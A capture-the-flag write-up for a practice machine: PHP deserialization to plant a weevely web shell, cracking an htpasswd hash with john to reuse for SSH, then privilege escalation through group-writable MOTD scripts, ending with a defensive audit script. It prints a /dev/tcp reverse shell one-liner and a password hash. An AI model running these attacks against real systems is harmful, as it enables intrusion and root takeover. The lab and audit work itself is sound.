There is a big, obvious deserialization vulnerability.
Generate a PHP web shell:
```
$ weevely generate -obfuscator cleartext1_php noraj agent.php
Generated 'agent.php' with password 'noraj' of 478 byte size.
```
My deserialization payload will override the class variables: I want a PHP file instead of a text file,
and I'll set the message content to my web shell.
With cat .htpasswd we can find a user hash for Apache: james:$apr1$zPZMix2A$d8fBXH0em33bfI9UTt9Nq1.
It may be worth cracking in case the password is reused for SSH.
```
$ john --wordlist=/usr/share/wordlists/passwords/rockyou.txt --format=md5crypt-long hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt-long, crypt(3) $1$ (and variants) [MD5 32/64])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
j<edited>a        (james)
1g 0:00:00:00 DONE (2021-07-27 16:59) 50.00g/s 32000p/s 32000c/s 32000C/s evelyn..pebbles
Use the "--show" option to display all of the cracked passwords reliably
Session completed
```

```
$ ssh james@debug.thm
The authenticity of host 'debug.thm (10.10.146.9)' can't be established.
ED25519 key fingerprint is SHA256:j1rsa6H3aWAH+1ivgTwsdNPBDEJU72p3MUWbcL70JII.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'debug.thm' (ED25519) to the list of known hosts.
james@debug.thm's password:
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.15.0-45-generic x86_64)

439 packages can be updated.
380 updates are security updates.

Last login: Wed Mar 10 18:36:58 2021 from 10.250.0.44
james@osboxes:~$ id
uid=1001(james) gid=1001(james) groups=1001(james)
james@osboxes:~$ cat user.txt
```
As you may already know, we are soon planning to submit this machine to THM's CyberSecurity Platform! Crazy... Isn't it?
But there's still one thing I'd like you to do, before the submission.
Could you please make our ssh welcome message a bit more pretty... you know... something beautiful :D
I gave you access to modify all these files :)
Oh and one last thing... You gotta hurry up! We don't have much time left until the submission!
Best Regards,
root
We have write permission on all the MOTD scripts:

```
james@osboxes:~$ ls -lhA /etc/update-motd.d/
total 28K
-rwxrwxr-x 1 root james 1.2K Mar 10 18:32 00-header
-rwxrwxr-x 1 root james    0 Mar 10 18:38 00-header.save
-rwxrwxr-x 1 root james 1.2K Jun 14  2016 10-help-text
-rwxrwxr-x 1 root james   97 Dec  7  2018 90-updates-available
-rwxrwxr-x 1 root james  299 Jul 22  2016 91-release-upgrade
-rwxrwxr-x 1 root james  142 Dec  7  2018 98-fsck-at-reboot
-rwxrwxr-x 1 root james  144 Dec  7  2018 98-reboot-required
-rwxrwxr-x 1 root james  604 Nov  5  2017 99-esm
```
We can append a reverse shell (/bin/bash -i >& /dev/tcp/10.9.19.77/9001 0>&1) to any of these files (e.g. 00-header),
and when any user connects it will be executed with root permissions.
It wasn't working with reverse shells, so I made a SUID bash instead.
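The misconfiguration behind this escalation is a root-executed MOTD script that a non-root principal (here the james group) can write to. As an added example, not part of the original writeup, here is a POSIX shell audit that flags every group- or other-writable script in /etc/update-motd.d, the check a defender would run to catch this before a login triggers the script as root. The function names and the sample directory that make_sample_motd_dir builds (mirroring the listing above) are constructed for this example and are not from the box.

```shell
#!/bin/sh
# Added example, not code from the original writeup: audit a MOTD script
# directory for files a non-root user could edit. pam_motd runs every script
# in /etc/update-motd.d as root at login, so a group- or world-writable script
# there (00-header above is rwxrwxr-x root:james) is exactly the
# privilege-escalation path the writeup uses. The sample directory built by
# make_sample_motd_dir is constructed for this example.

# audit_motd_dir [DIR]
# Prints the name of every regular file in DIR (default /etc/update-motd.d)
# that is writable by group or other. Returns 1 if any were found, 0 if none,
# 2 if DIR does not exist.
audit_motd_dir() {
    dir="${1:-/etc/update-motd.d}"
    [ -d "$dir" ] || { echo "no such directory: $dir" >&2; return 2; }
    # -perm -g=w / -perm -o=w are POSIX symbolic permission tests.
    weak=$(find "$dir" -maxdepth 1 -type f \( -perm -g=w -o -perm -o=w \) \
               -exec basename {} \; | sort)
    [ -n "$weak" ] || return 0
    printf '%s\n' "$weak"
    return 1
}

# count_weak_motd [DIR]: prints how many scripts audit_motd_dir flags.
count_weak_motd() {
    n=$(audit_motd_dir "${1:-/etc/update-motd.d}" | wc -l)
    echo $((n))   # arithmetic expansion strips the padding BSD wc adds
}

# make_sample_motd_dir: build a constructed directory mirroring the listing in
# the writeup (00-header group-writable, 10-help-text not) and print its path.
make_sample_motd_dir() {
    d=$(mktemp -d)
    printf '#!/bin/sh\nprintf "Welcome\\n"\n' > "$d/00-header"
    printf '#!/bin/sh\n' > "$d/10-help-text"
    chmod 775 "$d/00-header"     # rwxrwxr-x: group members can edit a root-run script
    chmod 755 "$d/10-help-text"  # rwxr-xr-x: only the owner can edit
    echo "$d"
}

# Stand-alone run: audit the constructed sample, then the real directory if present.
sample_dir=$(make_sample_motd_dir)
if audit_motd_dir "$sample_dir"; then
    echo "sample: no group/other-writable scripts"
else
    echo "sample: the scripts above could be modified by a non-root user"
fi
rm -rf "$sample_dir"
if [ -d /etc/update-motd.d ]; then
    audit_motd_dir /etc/update-motd.d \
        || echo "remediate with: chown root:root FILE && chmod 755 FILE"
fi
```

On the box, the listing above would make audit_motd_dir print all eight scripts and return 1; after chown root:root and chmod 755 it prints nothing and returns 0, which is the state a scheduled job or configuration-management check should enforce.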